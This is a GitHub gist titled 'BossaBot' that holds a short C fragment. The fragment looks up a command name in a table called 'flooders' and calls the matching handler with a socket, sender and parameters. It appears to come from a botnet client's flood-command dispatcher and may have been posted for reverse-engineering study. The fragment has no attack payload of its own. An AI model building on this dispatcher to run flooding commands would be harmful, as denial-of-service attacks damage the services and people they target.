Skip to content

Instantly share code, notes, and snippets.

@revENGR
Created May 3, 2020 10:31
Show Gist options
  • Save revENGR/04153a2cf880ce1fc540728be5e99efe to your computer and use it in GitHub Desktop.
Save revENGR/04153a2cf880ce1fc540728be5e99efe to your computer and use it in GitHub Desktop.
BossaBot
for (m=0; flooders[m].cmd != (char *)0; m++) {
if (!strcasecmp(flooders[m].cmd,name)) {
flooders[m].func(sock,sender,num_params-1,params);
for (i=1;i<num_params;i++) free(params[i]);
return;
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment